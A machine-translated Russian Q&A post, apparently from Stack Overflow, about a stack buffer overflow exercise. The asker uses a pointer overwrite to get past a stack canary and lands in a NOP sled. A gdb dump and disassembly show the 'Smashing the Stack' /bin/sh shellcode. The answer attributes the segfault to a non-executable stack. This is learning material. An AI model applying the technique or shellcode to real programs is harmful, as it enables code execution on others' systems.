Переполнение буфера: EIP и прыжок правильно установлен, но segfault

Question

Я выполняю переполнение буфера, избегая канарейки через memcpy указателю, как объяснено here. Короче говоря, вы переписываете адрес, на который указывает указатель, с адресом RET в стеке. Таким образом, memcpy-ing для этого указателя, эффективно перезаписывает RET.

Используя gdb, я добавляю свой NOP-sled + shellcode + address_overwrite просто отлично. Я вижу, что RET, на 0xbffff52c, содержит нужный адрес, 0xbffff4c0, который приземлится на санях NOP.

(gdb) x /32xw $esp 0xbffff470: 0xbffff52c 0x0804a008 0x00000004 0x00000000 0xbffff480: 0x000003f3 0x08048327 0x90909087 0x90909090 0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4d0: 0x90909090 0x90909090 0x90909090 0xeb909090 0xbffff4e0: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c (gdb) 0xbffff4f0: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8 0xbffff500: 0xffffdce8 0x69622fff 0x68732f6e 0xbffff52c 0xbffff510: 0xbffff5a8 0xb7ff5990 0x0000008f 0xbffff5a8 0xbffff520: 0xb7fd1ff4 0x0804a008 0xbffff5a8 0xbffff4c0 0xbffff530: 0x0804a008 0x0804a008 0x0000008f 0x00000001 0xbffff540: 0x00000801 0x00000000 0xbfff0000 0x002001ac 0xbffff550: 0x000081a4 0x00000001 0x000004ad 0x000004ad 0xbffff560: 0x00000000 0x00000000 0xb7fd0000 0x0000008f

Однако выполнение этого я получаю сильфон ошибки, даже если dissasembly показывает, что я приземлился хорошо.

Program received signal SIGSEGV, Segmentation fault. 
0xbffff4c0 in ??() 
(gdb) disas 0xbffff4c0, + 10 
Dump of assembler code from 0xbffff4c0 to 0xbffff4ca: 
=> 0xbffff4c0: nop 
    0xbffff4c1: nop 
    0xbffff4c2: nop 
    0xbffff4c3: nop 
    0xbffff4c4: nop 
    0xbffff4c5: nop 
    0xbffff4c6: nop 
    0xbffff4c7: nop 
    0xbffff4c8: nop 
    0xbffff4c9: nop 

Далее ниже шеллкод.

0xbffff4df: jmp 0xbffff500 
    0xbffff4e1: pop %esi 
    0xbffff4e2: mov %esi,0x8(%esi) 
    0xbffff4e5: xor %eax,%eax 
    0xbffff4e7: mov %al,0x7(%esi) 
    0xbffff4ea: mov %eax,0xc(%esi) 
    0xbffff4ed: mov $0xb,%al 
    0xbffff4ef: mov %esi,%ebx 

... и т.д.

Я использовал шеллкода от Smashing the stack, Приложение B, для системы Linux. Можете ли вы помочь мне понять, что случилось?

Answer 1

Вы не сказали, на какой ОС вы находитесь, или как вы создали свою целевую программу.

Предполагая, что Linux и нет -Wl,-z,execstack, современные дистрибутивы Linux по умолчанию равны -Wl,-z,noexecstack, что (неожиданно!) Делает стек неисполняемым.

Вы можете прочитать о некоторых механизмах защиты here.